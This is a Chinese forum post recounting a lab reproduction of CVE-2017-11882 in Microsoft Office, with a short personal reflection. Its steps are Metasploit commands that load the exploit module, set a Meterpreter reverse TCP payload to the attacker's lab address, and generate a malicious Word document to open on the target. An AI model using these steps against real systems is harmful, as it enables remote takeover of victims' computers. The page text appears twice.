CVE-2017-11882漏洞复现及个人体会

wuyou 发表了文章 • 0 个评论 • 41 次浏览 • 3 天前 • 来自相关话题

漏洞概述:
     CVE-2017-11882是一个潜伏17年之久的可以通杀office 2003到2016的所有版本的漏洞,攻击者只需要给目标发送一个word文档并且这个文档被打开,那么攻击者就可以肆意进行创建后门等操作。
复现环境:
    windows 7
     kail linux
     office 2016
过程:
      1、开启metasploit
                       root@wuyou:~# msfconsole
     2、搜寻模块并使用
                       msf > search CVE-2017-11882                    
                       msf > use exploit/windows/smb/CVE-2017-11882 
这里我使用了网上找的另一个rb文件




      3、查看设置并填入
                        msf exploit(windows/smb/CVE-2017-11882) > show options




查询渗透机IP地址
                     root@wuyou:~# ifconfig




设置渗透机的IP地址
                     msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.1.103
设置payload:
                     msf exploit(windows/smb/CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
最后再设置路径

     4、开始攻击并把生成的doc文档在靶机中打开
                     msf exploit(windows/smb/CVE-2017-11882) > exploit









结语: 
1、win10可以在靶机进行打开计算器之类的操作,但是想获取更多权限就不行了




 
2、第一次复现漏洞的我收获最大的东西并不是上面这个漏洞,而是整个的复现过程出现的各种问题和找到的解决方法,当我第一次看到这个漏洞的介绍时我觉得这个复现过程是如此的简单,但是实际过程却困难重重,我从装WIN7开始到解决metasploit出现的问题和试验各个版本、不同的环境和不同的复现方式直到开始写这篇文章坐在电脑前就已经有两天了,但我的收获也多且零碎到我无法在这篇文章中全部讲出来,这都需要自己实际操作一遍。
 
       查看全部
漏洞概述:
     CVE-2017-11882是一个潜伏17年之久的可以通杀office 2003到2016的所有版本的漏洞,攻击者只需要给目标发送一个word文档并且这个文档被打开,那么攻击者就可以肆意进行创建后门等操作。
复现环境:
    windows 7
     kail linux
     office 2016
过程:
      1、开启metasploit
                       root@wuyou:~# msfconsole
     2、搜寻模块并使用
                       msf > search CVE-2017-11882                    
                       msf > use exploit/windows/smb/CVE-2017-11882 
这里我使用了网上找的另一个rb文件
1.png

      3、查看设置并填入
                        msf exploit(windows/smb/CVE-2017-11882) > show options
3.png

查询渗透机IP地址
                     root@wuyou:~# ifconfig
if.png

设置渗透机的IP地址
                     msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.1.103
设置payload:
                     msf exploit(windows/smb/CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
最后再设置路径

     4、开始攻击并把生成的doc文档在靶机中打开
                     msf exploit(windows/smb/CVE-2017-11882) > exploit
4.png

222.png


结语: 
1、win10可以在靶机进行打开计算器之类的操作,但是想获取更多权限就不行了
fail.png

 
2、第一次复现漏洞的我收获最大的东西并不是上面这个漏洞,而是整个的复现过程出现的各种问题和找到的解决方法,当我第一次看到这个漏洞的介绍时我觉得这个复现过程是如此的简单,但是实际过程却困难重重,我从装WIN7开始到解决metasploit出现的问题和试验各个版本、不同的环境和不同的复现方式直到开始写这篇文章坐在电脑前就已经有两天了,但我的收获也多且零碎到我无法在这篇文章中全部讲出来,这都需要自己实际操作一遍。